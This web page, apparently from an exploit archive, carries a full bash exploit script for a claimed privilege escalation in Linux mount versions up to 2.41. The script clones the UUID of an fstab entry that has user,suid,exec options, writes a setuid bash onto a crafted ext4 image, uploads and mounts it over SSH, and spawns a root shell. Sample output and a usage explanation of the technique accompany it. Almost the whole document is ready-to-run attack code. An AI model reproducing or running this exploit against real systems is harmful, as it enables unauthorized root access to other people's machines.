Home Mount less than 2.42 Duplicate UUID mask exploit code
Page

Mount less than 2.42 Duplicate UUID mask exploit code 

#!/bin/bash
#
# oxagast
# marshall@oxasploits.com
#
# A Universally Ubiquitous ID plus an evil filesystem swap:
# A case study demonstrated in mount.
#
# sudo ./mount-under-2.42-0day-sploit.sh -u charlie -h 10.0.1.2 -k /home/attacker/.ssh/id_ed25519
# mount <= 2.41 exploit by oxagast
#
# [?] Checking for vulnerabilty...
# [!] Good, looks like the victim is vulnerable!
# [*] 10MB file gen...
# [*] Created mountpoint...
# [*] Created filesystem with UUID 116bf815-c476-4a78-a384-0169e828dcc5
# [*] Grabbing remote copy of /usr/bin/bash to use as payload on victim...
# [*] Payload copied to evil fs...  permissions updated...
# [*] Hey bby, why don't you come on over here and mount this...
# [*] Mounted evil fs on 10.0.1.2...
# [!] Spawning shell...
# whoami
# root
#
#
usage()
{
  echo "Linux mount <= 2.41 exploit by oxagast"
  echo
  echo "Usage: $0 -h 10.0.1.2 -u charlie"
  echo
  echo "For the HOST to be vulnerable it needs to have an /etc/fstab entry that"
  echo "uses a UUID to refer to the device, as well as having mount options"
  echo "equivilent to 'user,suid,exec'.  Access to the vulnerable host via"
  echo "ssh is also a requirement, though this was for ease of writing the"
  echo "exploit and not a true requirement for this to work."
  echo "A ext4 filesystem is created on a 10mb file with a UUID that is a duplicate"
  echo "of another UUID listed in /etc/fstab where user,suid,exec are required"
  echo "options (weather they are explicityly stated or implied), then"
  echo "/bin/bash is copied to the fs, where it's permissions are subsequently"
  echo "modified to include the suid bit set, the fs is dismounted and the resulting"
  echo "file is uploaded to the vuln box, where the file's filesystem with"
  echo "the cloned UUID is mounted in place of it's cloned UUID brother."
  echo "Mount doesn't check if the mount already exists as something else"
  echo "before letting you double up on the same mount point, and because user is"
  echo "specified, we can mount that fs as a user other than root,"
  echo "but still be able to execute the copy of bash sitting on the evil"
  echo "filesystem we created. This respects the suid bit setting because of fstab"
  echo "and executes the file as root, where a shell is waiting for us."
  exit 1
}
EK="exploit.key"
while getopts ":h:u:k:" OP; do
  case "${OP}" in
    u)
      USERNAME=${OPTARG}
      ;;
    h)
      HOST=${OPTARG}
      ;;
    k)
      EK=${OPTARG}
      ;;
    *)
      usage
      ;;
  esac
done
shift $((OPTIND - 1))
if [ -z "${HOST}" ] || [ -z "${USERNAME}" ]; then
  usage
  exit 1
fi
echo "mount <= 2.41 exploit by oxagast"
echo
if [[ $(id -u) != 0 ]]; then
  echo "[x] You need to run this locally as root!"
  exit 1
fi
rm -f exploit.key exploit.key.pub
if [[ $EK == "exploit.key" ]]; then
  echo "[*] Generating key..."
  ssh-keygen -f exploit.key -N "" >/dev/null
  echo "[*] Copying key..."
  echo "[?] Private key not specified, please enter SSH password..."
  ssh-copy-id -i exploit.key.pub -f ${USERNAME}@${HOST} 2>/dev/null >/dev/null
fi
echo "[?] Checking for vulnerabilty..."
if [[ $(
  ssh -i ${EK} ${USERNAME}@${HOST} true >/dev/null
  echo $?
) != 0 ]]; then
  echo "[x] Shit, Doesn't look like we have SSH access!"
  exit 1
fi
VUUID=$(ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep user | grep suid | grep exec | grep UUID | cut -d '=' -f 2 | cut -d ' ' -f 1)
if [[ ${VUUID} != "" ]]; then
  if [[ $(ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep ${VUUID} | grep "nosuid\|noexec" | wc -l) > 0 ]]; then
    echo "[x] Drats, not vulnerable! nosuid or noexec present!"
    echo "[x] Enteries in /etc/fstab are:"
    ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep -v '#'
    exit 1
  fi
fi
if [[ ${VUUID} == "" ]]; then
  echo "[x] Fuck, its not vulnerable!  Missing correct mount options or UUID reference."
  echo "[x] Enteries in /etc/fstab are:"
  ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep -v '#'
  exit 1
fi
echo "[!] Good, looks like the victim is vulnerable!"
MDIR=$(ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep ${VUUID} | cut -d ' ' -f 2)
fallocate -l 10M exploit
echo "[*] 10MB file gen..."
mkdir -p expdir
echo "[*] Created mountpoint..."
yes | mkfs.ext4 exploit -U ${VUUID} -L exploit 2>/dev/null >/dev/null
echo "[*] Created filesystem with UUID ${VUUID}"
mount exploit expdir/
if ! test -f "./payload"; then
  echo "[*] Grabbing remote copy of /usr/bin/bash to use as payload on victim..."
  scp -q -i ${EK} ${USERNAME}@${HOST}:/usr/bin/bash payload
fi
cp ./payload expdir/bash
chmod a+s expdir/bash
echo "[*] Payload copied to evil fs...  permissions updated..."
sync
umount expdir
echo "[*] Hey bby, why don't you come on over here and mount this..."
scp -q -i ${EK} exploit ${USERNAME}@${HOST}:
ssh -i ${EK} ${USERNAME}@${HOST} mount exploit
echo "[*] Mounted evil fs on ${HOST}..."
echo "[!] Spawning shell..."
sleep 1
echo "whoami"
WHO=$(ssh -i ${EK} ${USERNAME}@${HOST} ${MDIR}/bash -p -c whoami)
echo ${WHO}
if [[ ${WHO} -eq "root" ]]; then
  ssh -i ${EK} ${USERNAME}@${HOST} ${MDIR}/bash -p # boom
else
  echo "[x] Oof. Exploit failed! Sorry!"
fi
ssh -i ${EK} ${USERNAME}@${HOST} umount ${MDIR}
echo "[*] Cleaning up local files..."
rm -rf exploit expdir
rm -f exploit.key exploit.key.pub payload
Recently Updated